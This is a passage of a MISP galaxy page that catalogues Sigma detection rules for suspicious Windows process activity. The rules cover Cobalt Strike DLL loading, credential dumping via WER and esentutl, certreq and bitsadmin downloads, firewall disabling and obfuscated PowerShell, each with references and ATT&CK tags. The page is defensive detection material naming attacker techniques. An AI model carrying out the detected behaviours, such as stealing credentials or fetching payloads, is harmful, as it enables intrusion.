| author | X__Junior (Nextron Systems) |
| creation_date | 2023-07-18 |
| falsepositive | ['Legitimate administration activity', 'Software installations and removal'] |
| filename | proc_creation_win_netsh_fw_set_rule.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
CobaltStrike Load by Rundll32
Rundll32 can be used by Cobalt Strike with the StartW function to load DLLs from the command line.
Internal MISP references
UUID ae9c6a7c-9521-42a6-915e-5aaa8689d529 which can be used as unique global reference for CobaltStrike Load by Rundll32 in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ - webarchive
- https://redcanary.com/threat-detection-report/ - webarchive
- https://www.cobaltstrike.com/help-windows-executable - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Wojciech Lesicki |
| creation_date | 2021-06-01 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.011'] |
Related clusters
Copying Sensitive Files with Credential Data
Detects copying of files with well-known filenames (sensitive files containing credential data)
Internal MISP references
UUID e7be6119-fc37-43f0-ad4f-1f3f99be2f9f which can be used as unique global reference for Copying Sensitive Files with Credential Data in MISP communities and other software using the MISP galaxy
External references
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - webarchive
- https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/ - webarchive
- https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ - webarchive
- https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Esentutl.yml - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community |
| creation_date | 2019-10-22 |
| falsepositive | ['Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator.'] |
| filename | proc_creation_win_esentutl_sensitive_file_copy.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.002', 'attack.t1003.003', 'car.2013-07-001', 'attack.s0404'] |
Related clusters
WMIC Remote Command Execution
Detects the execution of WMIC to query information on a remote system
Internal MISP references
UUID 7773b877-5abb-4a3e-b9c9-fd0369b59b00 which can be used as unique global reference for WMIC Remote Command Execution in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/ - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-14 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmic_remote_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1047'] |
Related clusters
Potential Defense Evasion Via Right-to-Left Override
Detects the presence of the "U+202E" (right-to-left override) character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading technique.
Internal MISP references
UUID ad691d92-15f2-4181-9aa4-723c74f9ddc3 which can be used as unique global reference for Potential Defense Evasion Via Right-to-Left Override in MISP communities and other software using the MISP galaxy
External references
- https://unicode-explorer.com/c/202E - webarchive
- https://tria.ge/241015-l98snsyeje/behavioral2 - webarchive
- https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method - webarchive
- https://redcanary.com/blog/right-to-left-override/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2023-02-15 |
| falsepositive | ['Commandlines that contains scriptures such as arabic or hebrew might make use of this character'] |
| filename | proc_creation_win_susp_right_to_left_override.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036.002'] |
Related clusters
Suspicious Control Panel DLL Load
Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
Internal MISP references
UUID d7eb979b-c2b5-4a6f-a3a7-c87ce6763819 which can be used as unique global reference for Suspicious Control Panel DLL Load in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2017-04-15 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_rundll32_susp_control_dll_load.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.011'] |
Related clusters
Suspicious CertReq Command to Download
Detects a suspicious CertReq execution downloading a file. This behavior is often used by attackers to download additional payloads or configuration files. Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes.
Internal MISP references
UUID 4480827a-9799-4232-b2c4-ccc6c4e9e12b which can be used as unique global reference for Suspicious CertReq Command to Download in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-11-24 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_certreq_download.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1105'] |
Remote Access Tool - GoToAssist Execution
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Internal MISP references
UUID b6d98a4f-cef0-4abf-bbf6-24132854a83d which can be used as unique global reference for Remote Access Tool - GoToAssist Execution in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-13 |
| falsepositive | ['Legitimate use'] |
| filename | proc_creation_win_remote_access_tools_gotoopener.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Potential Product Class Reconnaissance Via Wmic.EXE
Detects the execution of WMIC in order to get a list of firewall, antivirus and antispyware products. Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms. This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.
Internal MISP references
UUID e568650b-5dcd-4658-8f34-ded0b1e13992 which can be used as unique global reference for Potential Product Class Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy
External references
- https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1 - webarchive
- https://www.trendmicro.com/en_us/research/25/c/socgholishs-intrusion-techniques-facilitate-distribution-of-rans.html - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2023-02-14 |
| falsepositive | ['Legitimate use of wmic.exe for reconnaissance of firewall, antivirus and antispyware products.'] |
| filename | proc_creation_win_wmic_recon_product_class.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1047', 'attack.discovery', 'attack.t1082'] |
Scheduled Task Executing Encoded Payload from Registry
Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
Internal MISP references
UUID c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 which can be used as unique global reference for Scheduled Task Executing Encoded Payload from Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-02-12 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_schtasks_reg_loader_encoded.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1053.005', 'attack.t1059.001'] |
HackTool - CrackMapExec Execution Patterns
Detects various execution patterns of the CrackMapExec pentesting framework
Internal MISP references
UUID 058f4380-962d-40a5-afce-50207d36d7e2 which can be used as unique global reference for HackTool - CrackMapExec Execution Patterns in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Thomas Patzke |
| creation_date | 2020-05-22 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_crackmapexec_execution_patterns.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1047', 'attack.t1053', 'attack.t1059.003', 'attack.t1059.001', 'attack.s0106'] |
Potentially Suspicious Regsvr32 HTTP IP Pattern
Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
Internal MISP references
UUID 2dd2c217-bf68-437a-b57c-fe9fd01d5de8 which can be used as unique global reference for Potentially Suspicious Regsvr32 HTTP IP Pattern in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/mrd0x/status/1461041276514623491 - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/ - webarchive
- https://twitter.com/tccontre18/status/1480950986650832903 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-01-11 |
| falsepositive | ['FQDNs that start with a number such as "7-Zip"'] |
| filename | proc_creation_win_regsvr32_http_ip_pattern.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.010'] |
PUA - SoftPerfect Netscan Execution
Detects usage of SoftPerfect's "netscan.exe", an application for scanning networks. It is actively used in the wild by threat actors to inspect and understand the network architecture of a victim.
Internal MISP references
UUID ca387a8e-1c84-4da3-9993-028b45342d30 which can be used as unique global reference for PUA - SoftPerfect Netscan Execution in MISP communities and other software using the MISP galaxy
External references
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue - webarchive
- https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/ - webarchive
- https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/ - webarchive
- https://www.protect.airbus.com/blog/uncovering-cyber-intruders-netscan/ - webarchive
- https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf - webarchive
- https://www.softperfect.com/products/networkscanner/ - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_netscan.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @d4ns4n_ (Wuerth-Phoenix) |
| creation_date | 2024-04-25 |
| falsepositive | ['Legitimate administrator activity'] |
| filename | proc_creation_win_pua_netscan.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1046'] |
PUA - System Informer Execution
Detects the execution of System Informer, a task manager tool used to view and manipulate processes, kernel options and other low-level operations.
Internal MISP references
UUID 5722dff1-4bdd-4949-86ab-fbaf707e767a which can be used as unique global reference for PUA - System Informer Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2023-05-08 |
| falsepositive | ['System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly'] |
| filename | proc_creation_win_pua_system_informer.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.discovery', 'attack.defense-evasion', 'attack.t1082', 'attack.t1564', 'attack.t1543'] |
Suspicious Obfuscated PowerShell Code
Detects suspicious UTF-16 and base64 encoded, often obfuscated, PowerShell code as commonly seen in command lines.
Internal MISP references
UUID 8d01b53f-456f-48ee-90f6-bc28e67d4e35 which can be used as unique global reference for Suspicious Obfuscated PowerShell Code in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-07-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_base64_encoded_obfusc.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Winrar Compressing Dump Files
Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
Internal MISP references
UUID 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc which can be used as unique global reference for Winrar Compressing Dump Files in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-01-04 |
| falsepositive | ['Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally', 'Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting'] |
| filename | proc_creation_win_winrar_exfil_dmp_files.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.t1560.001'] |
File Download Via Bitsadmin
Detects usage of bitsadmin to download a file.
Internal MISP references
UUID d059842b-6b9d-4ed1-b5c3-5b89143c6ede which can be used as unique global reference for File Download Via Bitsadmin in MISP communities and other software using the MISP galaxy
External references
- https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ - webarchive
- https://isc.sans.edu/diary/22264 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Michael Haag, FPT.EagleEye |
| creation_date | 2017-03-09 |
| falsepositive | ['Some legitimate apps use this, but limited.'] |
| filename | proc_creation_win_bitsadmin_download.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003'] |
Windows Firewall Disabled via PowerShell
Detects attempts to disable the Windows Firewall using PowerShell
Internal MISP references
UUID 12f6b752-042d-483e-bf9c-915a6d06ad75 which can be used as unique global reference for Windows Firewall Disabled via PowerShell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tim Rauch, Elastic (idea) |
| creation_date | 2022-09-14 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_disable_firewall.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562'] |
Potential PowerShell Downgrade Attack
Detects a PowerShell downgrade attack by comparing the host version with the engine version actually used (2.0).
Internal MISP references
UUID b3512211-c67e-4707-bedc-66efc7848863 which can be used as unique global reference for Potential PowerShell Downgrade Attack in MISP communities and other software using the MISP galaxy
External references
- http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ - webarchive
- https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade- - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Harish Segar (rule) |
| creation_date | 2020-03-20 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_downgrade_attack.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1059.001'] |
Invoke-Obfuscation Via Use Clip
Detects obfuscated PowerShell that uses Clip.exe in scripts.
Internal MISP references
UUID e1561947-b4e3-4a74-9bdd-83baed21bdb5 which can be used as unique global reference for Invoke-Obfuscation Via Use Clip in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nikita Nazarov, oscd.community |
| creation_date | 2020-10-09 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001'] |
Service Reconnaissance Via Wmic.EXE
An adversary might use WMI to check if a certain remote service is running on a remote device. When the query completes, the service information is displayed on the screen if the service exists. A common feedback message is "No instance(s) Available" if the queried service is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable.
Internal MISP references
UUID 76f55eaa-d27f-4213-9d45-7b0e4b60bbae which can be used as unique global reference for Service Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-14 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmic_recon_service.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1047'] |
Execute Code with Pester.bat
Detects code execution via Pester.bat (Pester is a PowerShell module for testing).
Internal MISP references
UUID 59e938ff-0d6d-4dc3-b13f-36cc28734d4e which can be used as unique global reference for Execute Code with Pester.bat in MISP communities and other software using the MISP galaxy
External references
- https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md - webarchive
- https://twitter.com/Oddvarmoe/status/993383596244258816 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Julia Fomina, oscd.community |
| creation_date | 2020-10-08 |
| falsepositive | ['Legitimate use of Pester for writing tests for Powershell scripts and modules'] |
| filename | proc_creation_win_lolbin_pester_1.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001', 'attack.defense-evasion', 'attack.t1216'] |
PUA - RunXCmd Execution
Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
Internal MISP references
UUID 93199800-b52a-4dec-b762-75212c196542 which can be used as unique global reference for PUA - RunXCmd Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-01-24 |
| falsepositive | ['Legitimate use by administrators'] |
| filename | proc_creation_win_pua_runxcmd.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1569.002', 'attack.s0029'] |
Suspicious File Download From IP Via Wget.EXE - Paths
Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
Internal MISP references
UUID 40aa399c-7b02-4715-8e5f-73572b493f33 which can be used as unique global reference for Suspicious File Download From IP Via Wget.EXE - Paths in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-02-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wget_download_susp_locations.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
PowerShell Base64 Encoded FromBase64String Cmdlet
Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
Internal MISP references
UUID fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c which can be used as unique global reference for PowerShell Base64 Encoded FromBase64String Cmdlet in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2019-08-24 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_base64_frombase64string.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1140', 'attack.execution', 'attack.t1059.001'] |
Change Default File Association To Executable Via Assoc
Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
Internal MISP references
UUID ae6f14e6-14de-45b0-9f44-c0986f50dc89 which can be used as unique global reference for Change Default File Association To Executable Via Assoc in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-28 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_cmd_assoc_tamper_exe_file_association.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.001'] |
Suspicious WmiPrvSE Child Process
Detects suspicious and uncommon child processes of WmiPrvSE
Internal MISP references
UUID 8a582fe2-0882-4b89-a82a-da6b2dc32937 which can be used as unique global reference for Suspicious WmiPrvSE Child Process in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - webarchive
- https://twitter.com/ForensicITGuy/status/1334734244120309760 - webarchive
- https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/ - webarchive
- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems) |
| creation_date | 2021-08-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmiprvse_susp_child_processes.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion', 'attack.t1047', 'attack.t1204.002', 'attack.t1218.010'] |
Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
Detects usage of cmdkey to look for cached credentials on the system
Internal MISP references
UUID 07f8bdc2-c9b3-472a-9817-5a670b872f53 which can be used as unique global reference for Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE in MISP communities and other software using the MISP galaxy
External references
- https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey - webarchive
- https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2019-01-16 |
| falsepositive | ['Legitimate administrative tasks'] |
| filename | proc_creation_win_cmdkey_recon.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.005'] |
Remote Code Execute via Winrm.vbs
Detects an attempt to execute code or create a service on a remote host via winrm.vbs.
Internal MISP references
UUID 9df0dd3a-1a5c-47e3-a2bc-30ed177646a0 which can be used as unique global reference for Remote Code Execute via Winrm.vbs in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Scripts/Winrm/ - webarchive
- https://redcanary.com/blog/lateral-movement-winrm-wmi/ - webarchive
- https://twitter.com/bohops/status/994405551751815170 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Julia Fomina, oscd.community |
| creation_date | 2020-10-07 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1216'] |
Potential Credential Dumping Via WER
Detects potential credential dumping via the LSASS Shtinkering technique, which abuses Windows Error Reporting to dump LSASS.
Internal MISP references
UUID 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3 which can be used as unique global reference for Potential Credential Dumping Via WER in MISP communities and other software using the MISP galaxy
External references
- https://github.com/deepinstinct/Lsass-Shtinkering - webarchive
- https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @pbssubhash, Nasreddine Bencherchali |
| creation_date | 2022-12-08 |
| falsepositive | ['Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine.'] |
| filename | proc_creation_win_werfault_lsass_shtinkering.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
Start of NT Virtual DOS Machine
Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
Internal MISP references
UUID 16905e21-66ee-42fe-b256-1318ada2d770 which can be used as unique global reference for Start of NT Virtual DOS Machine in MISP communities and other software using the MISP galaxy
External references
- https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/ - webarchive
- https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/ - webarchive
- https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support - webarchive
- https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-07-16 |
| falsepositive | ['Legitimate use'] |
| filename | proc_creation_win_susp_16bit_application.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Invoke-Obfuscation Obfuscated IEX Invocation
Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the referenced Out-ObfuscatedStringCommand.ps1 code block.
Internal MISP references
UUID 4bf943c6-5146-4273-98dd-e958fd1e3abf which can be used as unique global reference for Invoke-Obfuscation Obfuscated IEX Invocation in MISP communities and other software using the MISP galaxy
External references
- https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Daniel Bohannon (@Mandiant/@FireEye), oscd.community |
| creation_date | 2019-11-08 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
